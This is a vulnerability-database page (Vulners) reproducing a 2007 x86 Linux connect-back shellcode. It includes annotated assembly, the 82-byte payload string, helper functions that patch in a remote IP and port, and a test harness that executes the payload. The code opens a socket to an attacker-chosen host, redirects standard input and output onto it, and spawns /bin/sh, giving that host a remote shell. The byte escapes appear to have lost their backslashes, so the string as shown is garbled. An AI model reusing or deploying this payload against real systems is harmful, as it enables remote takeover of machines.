Vulners
Lucene search
linux/x86 SET_IP() Connectback Shellcode 82 bytes
/*---------------------------------------------------------------------------*
* 82 byte Connectback shellcode *
* by Benjamin Orozco - [email protected] *
*---------------------------------------------------------------------------*
* filename: x86-linux-connectback.c *
* discription: x86-linux connect back shellcode. Use SET_PORT() and *
* SET_IP() before using the shellcode. Example: *
* *
* SET_IP(sc, "192.168.13.22"); *
* SET_PORT(sc, 31337); *
* *
*___________________________________________________________________________*
*---------------------------------------------------------------------------*/
/*---------------------------------------------------------------------------*
* ASM Code *
*---------------------------------------------------------------------------*
# s = socket(2, 1, 0)
push $0x66 #
pop %eax # 0x66 = socketcall
push $0x1 #
pop %ebx # socket() = 1
xor %ecx,%ecx #
push %ecx # 0
push $0x1 # SOCK_STREAM = 1
push $0x2 # AF_INET = 2
mov %esp,%ecx # Arguments
int $0x80 # EXECUTE - Now %eax have the s fileDescriptor
# connect(s, [2, 64713, 127.127.127], 0x10)
push $0x7f7f7f7f # 127.127.127 = 0x7f7f7f7f
pushw $0xc9fc # PORT = 64713
pushw $0x2 # AF_INET = 2
mov %esp,%ecx # %ecx holds server struct
push $0x10 # sizeof(server) = 10
push %ecx # server struct
push %eax # s fileDescriptor
mov %esp,%ecx
mov %eax,%esi # now %esi holds s fileDescriptor [for connect()]
push $0x3 #
pop %ebx # connect() = 3
push $0x66 #
pop %eax # 0x66 = socketcall
int $0x80 # On success %eax = 0
# dup2(s, 2) , dup2(s, 1) , dup2(s, 0)
xchg %esi,%ebx # Put s fileDescriptor on %ebx [for dup2()]
push $0x2
pop %ecx
dup_loop:
mov $0x3f,%al # dup2() = 0x3f
int $0x80
dec %ecx
jns dup_loop
# execve("/bin//sh", ["/bin//sh",NULL])
mov $0xb,%al # execve = 11d
xor %edx,%edx
push %edx
push $0x68732f2f
push $0x6e69622f
mov %esp,%ebx
push %edx
push %ebx
mov %esp, %ecx
int $0x80
*----------------------------------------------------------------------------*/
char sc[] =
"x6ax66" //push $0x66
"x58" //pop %eax
"x6ax01" //push $0x1
"x5b" //pop %ebx
"x31xc9" //xor %ecx,%ecx
"x51" //push %ecx
"x6ax01" //push $0x1
"x6ax02" //push $0x2
"x89xe1" //mov %esp,%ecx
"xcdx80" //int $0x80
"x68x7fx7fx7fx7f" //push $0x7f7f7f7f //IP
"x66x68xfcxc9" //pushw $0xc9fc //PORT
"x66x6ax02" //pushw $0x2
"x89xe1" //mov %esp,%ecx
"x6ax10" //push $0x10
"x51" //push %ecx
"x50" //push %eax
"x89xe1" //mov %esp,%ecx
"x89xc6" //mov %eax,%esi
"x6ax03" //push $0x3
"x5b" //pop %ebx
"x6ax66" //push $0x66
"x58" //pop %eax
"xcdx80" //int $0x80
"x87xf3" //xchg %esi,%ebx
"x6ax02" //push $0x2
"x59" //pop %ecx
"xb0x3f" //mov $0x3f,%al
"xcdx80" //int $0x80
"x49" //dec %ecx
"x79xf9" //jns 34 <dup_loop>
"xb0x0b" //mov $0xb,%al
"x31xd2" //xor %edx,%edx
"x52" //push %edx
"x68x2fx2fx73x68" //push $0x68732f2f
"x68x2fx62x69x6e" //push $0x6e69622f
"x89xe3" //mov %esp,%ebx
"x52" //push %edx
"x53" //push %ebx
"x89xe1" //mov %esp,%ecx
"xcdx80"; //int $0x80
void SET_PORT(char *buf, int port) {
*(unsigned short *)(((buf)+24)) = (port);
char tmp = buf[24];
buf[24] = buf[25];
buf[25] = tmp;
}
void SET_IP(char *buf, char *ip) {
unsigned long backip = inet_addr(ip);
*(unsigned long *)(((buf)+18)) = (backip);
}
main(){
printf("size: %d bytes
", strlen(sc));
SET_PORT(sc, 33333);
SET_IP(sc, "127.0.0.1");
__asm__("call sc");
}
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
07 Feb 2007 00:00Current
7.1High risk
Vulners AI Score7.1